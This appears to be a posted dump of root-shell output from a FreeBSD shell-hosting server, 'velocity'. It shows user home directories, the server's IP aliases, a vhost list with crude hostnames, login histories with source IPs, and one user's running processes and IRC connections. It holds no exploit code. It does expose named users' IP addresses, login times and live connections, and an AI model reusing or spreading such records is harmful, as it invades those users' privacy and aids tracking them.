drwxr-xr-x    2 grindey      grindey       512 Mar 25  2008 grindey/
drwxr-xr-x    2 groove       groove        512 Apr 12  2007 groove/
drwxr-xr-x    5 grumpy       grumpy        512 Feb  4 18:06 grumpy/
drwxr-xr-x    4 hh360        hh360         512 May 19  2008 hh360/
drwxr-xr-x    2 hixk         hixk          512 Nov 24  2008 hixk/
drwxr-xr-x    3 howell1      howell1       512 May 29 20:39 howell1/
drwxr-xr-x   12 hts          hts          1024 Jun 20 20:58 hts/
drwxr-xr-x    2 hw4tbnc      hw4tbnc       512 May 11  2008 hw4tbnc/
drwxr-xr-x    4 ioplex       ioplex        512 May  8 20:16 ioplex/
drwxr-xr-x    6 ircjaymz     ircjaymz      512 Mar 18  2008 ircjaymz/
drwxr-xr-x    2 ircusr       ircusr        512 Jan 20 17:49 ircusr/
drwxr-xr-x    2 itzkorn      itzkorn       512 Apr 12  2007 itzkorn/
drwxr-xr-x    2 izedd        izedd         512 Oct  9  2007 izedd/
drwxr-xr-x    2 jaiven       jaiven        512 Feb 16 17:08 jaiven/
drwxr-xr-x    4 jamesn       jamesn        512 May 31  2007 jamesn/
drwxr-xr-x    8 jax66        jax66        1024 May 14 16:03 jax66/
drwxr-xr-x    2 jerryste     jerryste      512 Dec 28 14:19 jerryste/
-rw-r--r--    1 root         wheel           0 Oct  5  2007 jj.log
drwxr-xr-x    2 jschultk     jschultk      512 May 31  2007 jschultk/
drwxr-xr-x    2 jtracy       jtracy        512 Dec  3  2008 jtracy/
drwxr-xr-x    2 katsst       katsst        512 Apr 12  2007 katsst/
drwxr-xr-x   15 khicks       khicks       1024 Jan  2  2008 khicks/
drwxr-xr-x    2 kingzy       kingzy        512 Feb 22 16:50 kingzy/
drwxr-xr-x    4 kokoryu      kokoryu       512 Feb  1 16:54 kokoryu/
drwxr-xr-x    2 kooner       kooner        512 Mar 24 17:34 kooner/
drwxr-xr-x    2 kruapra      kruapra       512 Jan  1  2008 kruapra/
drwxr-xr-x    2 ksafusi      ksafusi       512 Jan 29  2008 ksafusi/
drwxr-xr-x    2 l33t         l33t          512 Apr 12  2007 l33t/
drwxr-xr-x    2 lailoke      lailoke       512 Mar 11 22:12 lailoke/
drwxr-xr-x    9 lordy        lordy         512 May 17 04:05 lordy/
drwxr-xr-x    8 ltootle      ltootle       512 Jun 10  2008 ltootle/
drwxr-xr-x   15 lyhne1       lyhne1       1024 May 25 23:00 lyhne1/
drwxr-xr-x    6 lymelyte     lymelyte      512 Mar 29 14:18 lymelyte/
drwxr-xr-x    3 lynx         lynx          512 May 28  2008 lynx/
drwxr-xr-x    2 mae21        mae21         512 Mar  8 21:02 mae21/
drwxr-xr-x    5 manboo       manboo        512 Jul  7  2008 manboo/
drwxr-xr-x    3 matt         matt          512 Jun 20 19:25 matt/
drwxr-xr-x    2 methanl      methanl       512 Feb  5  2008 methanl/
drwxr-xr-x    6 mimik0r      mimik0r       512 May 20  2008 mimik0r/
drwxr-xr-x    2 mindben      mindben       512 Nov 24  2008 mindben/
drwxr-xr-x    7 mlh          mlh           512 Apr  8 01:12 mlh/
drwxr-xr-x    3 mogle3       mogle3        512 Apr  8 12:06 mogle3/
drwxr-xr-x    3 mooo         mooo          512 May 21 20:50 mooo/
drwxr-xr-x    5 mrts         mrts          512 Mar 18 01:51 mrts/
drwxr-xr-x    9 narcissu     narcissu      512 Feb  2  2008 narcissu/
drwxr-xr-x    7 nardi        nardi         512 Mar 24 10:55 nardi/
drwxr-xr-x    3 nek0o        nek0o         512 Jul 21  2008 nek0o/
drwxr-xr-x    3 neohax       neohax        512 Jun 13  2007 neohax/
drwxr-xr-x    3 nexxtea      nexxtea       512 Apr 19  2007 nexxtea/
drwxr-xr-x    9 nodex        nodex         512 Sep  5  2007 nodex/
drwxr-xr-x    2 nsc          wheel         512 Apr 12  2007 nsc/
drwxr-xr-x    3 nyakz        nyakz         512 Mar 13 20:13 nyakz/
drwxr-xr-x    9 oby1         oby1          512 Feb 13  2008 oby1/
drwxr-xr-x   21 omelette     omelette     1024 Jun  1  2008 omelette/
drwxr-xr-x    2 omen         omen          512 Nov 24  2008 omen/
drwxr-xr-x    5 omgwtf       omgwtf        512 Apr 27 03:17 omgwtf/
drwxr-xr-x    5 owine        owine         512 Apr 21  2008 owine/
drwxr-xr-x    6 own3d        own3d         512 Oct 15  2008 own3d/
drwxr-xr-x    5 paleride     paleride      512 Jan 27 17:55 paleride/
drwxr-xr-x    2 pbx          pbx           512 Dec 28 14:22 pbx/
drwxr-xr-x    2 percott1     percott1      512 Jun 24  2008 percott1/
drwxr-xr-x    8 pimpinjg     pimpinjg      512 Jun 23 07:20 pimpinjg/
drwxr-xr-x    4 poolboy      poolboy       512 Aug 29  2007 poolboy/
drwxr-xr-x    3 prodigy      prodigy       512 May 30  2008 prodigy/
drwxr-xr-x    3 psycoz       psycoz        512 Jun  7 17:01 psycoz/
drwxr-xr-x    2 qberto       qberto        512 Mar 17 12:09 qberto/
drwxr-xr-x    7 qfx          qfx           512 Feb 17 04:54 qfx/
drwxr-xr-x    4 quinn        quinn         512 Aug 10  2007 quinn/
drwxr-xr-x    5 reaper90     reaper90      512 Dec  2  2007 reaper90/
drwxr-xr-x   22 redrum       redrum       1024 Jun  9 12:49 redrum/
drwxr-xr-x    5 reznik       reznik        512 Apr 11  2008 reznik/
drwxr-xr-x    4 rice21       rice21        512 Dec 17  2008 rice21/
drwxr-xr-x    4 rikt         rikt          512 Feb 17 06:27 rikt/
drwxr-xr-x    5 romeo        romeo         512 Jun 20 02:58 romeo/ 
drwxr-xr-x    7 roodyk       roodyk        512 Apr 26 14:04 roodyk/
drwxr-xr-x    3 sacred       sacred        512 Jun  1  2007 sacred/
drwxr-xr-x    3 safety       safety        512 Feb 15  2008 safety/
drwxr-xr-x    2 sakik1       sakik1        512 Dec  3  2008 sakik1/
drwxr-xr-x    2 sal          sal           512 Feb 16 17:17 sal/
drwxr-xr-x    5 schlomer     schlomer      512 Aug 24  2007 schlomer/
drwxr-xr-x    7 scouse       scouse       1536 Nov  5  2008 scouse/
drwxr-xr-x    5 sharpie      sharpie       512 Apr 13  2007 sharpie/
drwxr-xr-x    5 shoes        shoes         512 Mar  7 22:32 shoes/
drwxr-xr-x    2 silver15     silver15      512 Mar 25  2008 silver15/
drwxr-xr-x    3 simonbh      simonbh       512 Aug  9  2007 simonbh/
drwxr-xr-x    9 sinistro     sinistro      512 Oct  5  2007 sinistro/
drwxr-xr-x    2 skit         skit          512 Apr 12  2007 skit/
drwxr-xr-x    6 skypilot     skypilot      512 Nov  7  2008 skypilot/
drwxr-xr-x    5 smash        smash         512 Jun 22 01:29 smash/
drwxr-xr-x    6 sqd          sqd           512 May  7 20:56 sqd/
drwxr-xr-x    3 ssaws        ssaws         512 Feb  3 23:20 ssaws/
drwxr-xr-x    4 ste          ste           512 Jun 15 12:29 ste/
drwxr-xr-x    5 subkult      subkult       512 Feb  3 11:59 subkult/
drwxr-xr-x    7 sysc         sysc          512 Jun 11 10:27 sysc/
drwxr-xr-x    9 tarawa       tarawa        512 May 26 10:51 tarawa/
drwxr-xr-x    3 tea          tea           512 Mar 16  2008 tea/
drwxr-xr-x    5 techi3       techi3        512 Aug 29  2007 techi3/
drwxr-xr-x    5 timgor       timgor       1024 Sep  3  2007 timgor/
drwxr-xr-x    3 tlm          tlm           512 May  1  2007 tlm/
drwxr-xr-x    7 vamp         vamp         1024 Nov 20  2007 vamp/
drwxr-xr-x    2 vietnigh     vietnigh      512 Mar  8 15:31 vietnigh/
drwxr-xr-x    3 visage       visage        512 Mar 13 15:59 visage/
drwxr-xr-x    4 vitalrbj     vitalrbj      512 May 15  2007 vitalrbj/
drwxr-xr-x    3 vividbreeze  vividbreeze   512 May 15  2005 vividbreeze/
drwxr-xr-x    2 voxitize     voxitize      512 Aug 18  2008 voxitize/
drwxr-xr-x    5 warlordz     warlordz      512 Aug 20  2007 warlordz/
drwxr-xr-x    3 wchan21      wchan21       512 Dec 15  2008 wchan21/
drwxr-xr-x    4 wolf         wolf          512 Aug 28  2008 wolf/
drwxr-xr-x    2 xavi         xavi          512 Feb  1 16:56 xavi/
drwxr-xr-x    3 xckx         xckx          512 Oct  4  2007 xckx/
drwxr-xr-x    4 xkelsx       xkelsx        512 Dec 16  2008 xkelsx/
drwxr-xr-x    5 y2j          y2j           512 May 15 08:42 y2j/
drwxr-xr-x   13 yaquis       yaquis       1024 Jun 11 14:32 yaquis/
drwxr-xr-x    8 zeepysea     zeepysea      512 Oct 21  2008 zeepysea/
drwxr-xr-x    6 zenchi       zenchi        512 Nov 29  2007 zenchi/
drwxr-xr-x    4 zime         zime          512 Feb 15  2008 zime/
drwxr-xr-x    3 zoo          zoo           512 Apr 14  2007 zoo/
[root@velocity:/home]# 


[root@velocity:/home]# ifconfig
bge0: flags=8843 mtu 1500
        options=1b
        inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
        inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
        inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
        inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
        inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
        inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
        inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
        inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
        inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
        inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
        inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
        inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
        inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
        inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
        inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
        inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
        inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
        inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
        inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
        inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
        inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
        inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
        inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
        inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
        inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
        inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
        inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
        inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
        inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
        inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
        inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
        inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
        inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
        inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
        inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
        inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
        inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
        inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
        inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
        inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
        inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
        inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
        inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
        inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
        inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
        inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
        inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
        inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
        inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
        inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
        inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
        inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
        inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
        inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
        inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
        inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
        inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
        inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
        inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
        inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
        inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
        inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
        inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
        ether 00:11:11:cc:09:63
        media: Ethernet 10baseT/UTP 
        status: active
lo0: flags=8049 mtu 16384
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 
        inet6 ::1 prefixlen 128 
        inet 127.0.0.1 netmask 0xff000000 
[root@velocity:/home]# 


[root@velocity:/usr/home]# cat /bin/vhosts 
#!/usr/local/bin/bash
echo "

          _   __/ /_  ____  _____/ /______
         | | / / __ \/ __ \/ ___/ __/ ___/
         | |/ / / / / /_/ (__  ) /_(__  )
         |___/_/ /_/\____/____/\__/____/
           www.vitalspeeds.com/vhosts

72.20.3.98 -\> .
72.20.28.193 -\> scaring.us.
72.20.28.194 -\> .
72.20.28.195 -\> George.W.Bush.is.scaring.us.
72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
72.20.28.197 -\> your.mom.is.scaring.us.
72.20.28.198 -\> irc.isidling.net.
72.20.28.199 -\> everyone.isalways.idling.net.
72.20.28.200 -\> just.idling.net.
72.20.28.201 -\> the.mpaa.keeps.scaring.us.
72.20.28.202 -\> the.riaa.keeps.scaring.us.
72.20.28.203 -\> defaultxbe.com.
72.20.28.204 -\> ownage.net.
72.20.28.205 -\> absolute.ownage.net.
72.20.28.206 -\> complete.ownage.net.
72.20.28.207 -\> is.the.godofgods.net.
72.20.28.208 -\> fatblunts.com.
72.20.28.209 -\> will.work.for.fatblunts.com.
72.20.28.210 -\> smokes.fatblunts.com.
72.20.28.211 -\> rolls.fatblunts.com.
72.20.28.212 -\> fuckdapolice.com.
72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
72.20.28.215 -\> playah.org.
72.20.28.216 -\> big.time.playah.org.
72.20.28.217 -\> still.a.playah.org.
72.20.28.218 -\> the.original.playah.org.
72.20.28.219 -\> shitsngiggles.net.
72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
72.20.28.221 -\> us-govt.info.
72.20.28.222 -\> has.topsecret.us-govt.info.
72.20.28.223 -\> steals.us-govt.info.
72.20.28.224 -\> packets.the.us-govt.info.
72.20.28.225 -\> oblivion.globalwar.net.
72.20.28.226 -\> started.a.globalwar.net.
72.20.28.227 -\> irc.sith-net.com.
72.20.28.228 -\> i.am.away.idling.net.
72.20.28.229 -\> you.got.schooled.org.
72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
72.20.28.231 -\> dont.fuck.withthe.us.
72.20.28.232 -\> stole.your-ip.info.
72.20.28.233 -\> has.your-ip.info.
72.20.28.234 -\> overflo.ws.
72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
72.20.28.236 -\> buffer.overflo.ws.
72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
72.20.28.238 -\> the.toilet.overflo.ws.
72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
72.20.28.240 -\> i.am.teh.antidr.ug.
72.20.28.241 -\> irc.cheazey.net.
72.20.28.242 -\> staff.vitalspeeds.com.
72.20.28.243 -\> oper.idlenetworks.net.
72.20.28.244 -\> .
72.20.28.245 -\> .
72.20.28.246 -\> .
72.20.28.247 -\> .
72.20.28.248 -\> .
72.20.28.249 -\> .
72.20.28.250 -\> .
72.20.28.251 -\> .
72.20.28.252 -\> .
72.20.28.253 -\> cyberia.is.scaring.us.
72.20.28.254 -\> anarchy.fuckdapolice.com.
"


[root@velocity:~]# last root

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# last romeo
romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00)

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# last pimpinjg
pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51  (00:22)
pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44  (00:56)
pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46  (00:05)
pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41  (00:00)
pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41  (00:10)
pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35  (00:02)
pimpinjg         ttyp3    cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53  (12:06)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01)

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# 

[root@velocity:~]# ps -aux | grep romeo
root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.16 sshd: romeo [priv] (sshd)
romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:01.47 sshd:  (sshd)
romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
romeo      51241  0.0  0.6  9296  6136  p0  S+   11:50PM   0:10.95 irssi -h absolute.ownage.net
romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.04 -bash (bash)
romeo      62761  0.0  0.1  2040  1448  p2  S+    4:25AM   0:00.04 screen -r

[root@velocity:~]# lsof -i -n | grep romeo
irssi     51241      romeo    3u  IPv4 0xca130740      0t0  TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
irssi     51241      romeo    4u  IPv4 0xc58c4740      0t0  TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
irssi     51241      romeo    7u  IPv4 0xca04a1d0      0t0  TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
sshd      60584      romeo    3u  IPv4 0xc9e971d0      0t0  TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
[root@velocity:~]# 

[root@velocity:/var/run]# ps -auxwww
USER         PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
root          10 83.0  0.0     0     8  ??  RL   27Jan08 534762:26.98 [idle]
lyhne1     85085 11.3  0.3 10700  3096  ??  S    11May09 1274:26.14 /home/lyhne1/services/services
root           0  0.0  0.0     0     0  ??  WLs  27Jan08   0:00.08 [swapper]
root           1  0.0  0.0   772    80  ??  ILs  27Jan08  21:20.52 /sbin/init --
root           2  0.0  0.0     0     8  ??  DL   27Jan08  38:47.98 [g_event]
root           3  0.0  0.0     0     8  ??  DL   27Jan08 187:53.55 [g_up]
root           4  0.0  0.0     0     8  ??  DL   27Jan08 141:20.71 [g_down]
root           5  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [kqueue taskq]
root           6  0.0  0.0     0     8  ??  DL   27Jan08   0:00.01 [thread taskq]
root           7  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_0]
root           8  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_1]
root           9  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_2]
root          11  0.0  0.0     0     8  ??  WL   27Jan08 3371:26.93 [swi4: clock sio]
root          12  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi3: vm]
root          13  0.0  0.0     0     8  ??  WL   27Jan08 6365:16.77 [swi1: net]
root          14  0.0  0.0     0     8  ??  DL   27Jan08 557:44.26 [yarrow]
root          15  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi6: task queue]
root          16  0.0  0.0     0     8  ??  WL   27Jan08   0:00.01 [swi6: Giant taskq]
root          17  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi5: +]
root          18  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi2: cambio]
root          19  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq9: acpi0]
root          20  0.0  0.0     0     8  ??  WL   27Jan08 5058:47.37 [irq16: bge0]
root          21  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq21: uhci0 ehci0]
root          22  0.0  0.0     0     8  ??  DL   27Jan08   0:02.22 [usb0]
root          23  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [usbtask]
root          24  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq22: uhci1]
root          25  0.0  0.0     0     8  ??  DL   27Jan08   0:02.68 [usb1]
root          26  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq18: uhci2]
root          27  0.0  0.0     0     8  ??  DL   27Jan08   0:01.99 [usb2]
root          28  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq23: uhci3]
root          29  0.0  0.0     0     8  ??  DL   27Jan08   0:02.09 [usb3]
root          30  0.0  0.0     0     8  ??  DL   27Jan08   0:02.34 [usb4]
root          31  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq14: ata0]
root          32  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq15: ata1]
root          33  0.0  0.0     0     8  ??  WL   27Jan08 149:12.28 [irq20: atapci1]
root          34  0.0  0.0     0     8  ??  WL   27Jan08   0:00.60 [irq1: atkbd0]
root          35  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi0: sio]
root          36  0.0  0.0     0     8  ??  DL   27Jan08  15:56.90 [pagedaemon]
root          37  0.0  0.0     0     8  ??  DL   27Jan08   0:01.89 [vmdaemon]
root          38  0.0  0.0     0     8  ??  DL   27Jan08  98:08.61 [pagezero]
root          39  0.0  0.0     0     8  ??  DL   27Jan08   3:59.11 [bufdaemon]
root          40  0.0  0.0     0     8  ??  DL   27Jan08 519:04.35 [syncer]
root          41  0.0  0.0     0     8  ??  DL   27Jan08   5:03.46 [vnlru]
root          42  0.0  0.0     0     8  ??  DL   27Jan08  56:44.12 [softdepflush]
root          43  0.0  0.0     0     8  ??  DL   27Jan08  96:57.63 [schedcpu]
root         753  0.0  0.0   528     0  ??  IWs  -         0:00.00 /sbin/devd
root         808  0.0  0.0  1376   368  ??  Ss   27Jan08  29:30.11 /usr/sbin/syslogd -s
root         905  0.0  0.0  1288   108  ??  Ss   27Jan08   0:38.65 /usr/sbin/usbd
nobody       921  0.0  0.1  2368   644  ??  Ss   27Jan08  10:21.51 proftpd: (accepting connections) (proftpd)
root         973  0.0  0.0  1444   344  ??  Is   27Jan08   9:25.16 /usr/sbin/cron -s
nodex       1211  0.0  0.1  4892   620  ??  S    27Jan08   2:16.48 ./services
